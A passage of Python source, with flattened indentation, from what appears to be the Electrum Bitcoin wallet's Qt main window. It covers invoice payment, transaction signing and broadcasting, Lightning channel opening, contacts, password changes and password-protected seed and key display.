if self.check_send_tab_payto_line_and_show_errors():
return
try:
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
except InvoiceError as e:
self.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_str = self.get_frozen_balance_str()
if frozen_str:
text += " ({} {})".format(
frozen_str, _("are frozen")
)
return text
def get_frozen_balance_str(self) -> Optional[str]:
frozen_bal = sum(self.wallet.get_frozen_balance())
if not frozen_bal:
return None
return self.format_amount_and_units(frozen_bal)
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if any(parse_max_spend(outval) for outval in output_values):
output_value = '!'
else:
output_value = sum(output_values)
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if conf_dlg.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not conf_dlg.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
node_id, rest = extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
if self.wallet.lnworker.has_conflicting_backup_with(node_id):
msg = messages.MGS_CONFLICTING_BACKUP_INSTANCE
if not self.question(msg):
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(
connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure)
def on_open_channel_success(self, args):
chan, funding_tx = args
lnworker = self.wallet.lnworker
if not chan.has_onchain_backup():
backup_dir = self.config.get_backup_dir()
if backup_dir is not None:
self.show_message(_(f'Your wallet backup has been updated in {backup_dir}'))
else:
data = lnworker.export_channel_backup(chan.channel_id)
help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL)
self.show_qrcode(
data, _('Save channel backup'),
help_text=help_text,
show_copy_text_btn=True)
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
self.show_transaction(funding_tx)
else:
self.show_message(message)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def set_ln_invoice(self, invoice: str):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice)
except LnInvoiceException as e:
self.show_error(_("Error parsing Lightning invoice") + f":\n{e}")
return
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.payto_e.lightning_invoice = invoice
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def set_bip21(self, text: str):
try:
out = util.parse_URI(text, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
def pay_to_URI(self, text: str):
if not text:
return
# first interpret as lightning invoice
bolt11_invoice = maybe_extract_bolt11_invoice(text)
if bolt11_invoice:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_bip21(text)
# update fiat amount
self.amount_e.textEdited.emit("")
self.show_send_tab()
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return tab
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.update_lightning_icon()
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if not self.wallet.has_lightning():
self.lightning_button.setVisible(False)
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self, dialog):
assert not self.wallet.has_lightning()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
if self.question(msg):
self._init_lightning_dialog(dialog=dialog)
@protected
def _init_lightning_dialog(self, *, dialog, password):
dialog.close()
self.wallet.init_lightning(password=password)
self.update_lightning_icon()
self.show_message(_('Lightning keys have been initialized.'))
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('False')
if self.wallet.has_seed():
seed_available = _('True')
ks = self.wallet.keystore
assert isinstance(ks, keystore.Deterministic_KeyStore)
seed_available += f" ({ks.get_seed_type()})"
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(WWLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(WWLabel(basename), 0, 1)
grid.addWidget(WWLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(WWLabel(wallet_type), 1, 1)
grid.addWidget(WWLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(WWLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(WWLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(WWLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(WWLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(WWLabel(ks_type), 4, 1)
# lightning
grid.addWidget(WWLabel(_('Lightning') + ':'), 5, 0)
from .util import IconLabel
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
grid.addWidget(WWLabel(_('Enabled')), 5, 1)
else:
label = IconLabel(text='Enabled, non-recoverable channels')
label.setIcon(read_QIcon('nocloud'))
grid.addWidget(label, 5, 1)
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
grid.addWidget(HelpButton(msg), 5, 3)
grid.addWidget(WWLabel(_('Lightning Node ID:')), 7, 0)
# TODO: ButtonsLineEdit should have a addQrButton method
nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex()
nodeid_e = ButtonsLineEdit(nodeid_text)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code"))
nodeid_e.addCopyButton(self.app)
nodeid_e.setReadOnly(True)
nodeid_e.setFont(QFont(MONOSPACE_FONT))
grid.addWidget(nodeid_e, 8, 0, 1, 4)
else:
if self.wallet.can_have_lightning():
grid.addWidget(WWLabel('Not enabled'), 5, 1)
button = QPushButton(_("Enable"))
button.pressed.connect(lambda: self.init_lightning_dialog(dialog))
grid.addWidget(button, 5, 3)
else:
grid.addWidget(WWLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(WWLabel(_("Derivation path") + ':'))
der_path_text = WWLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(WWLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
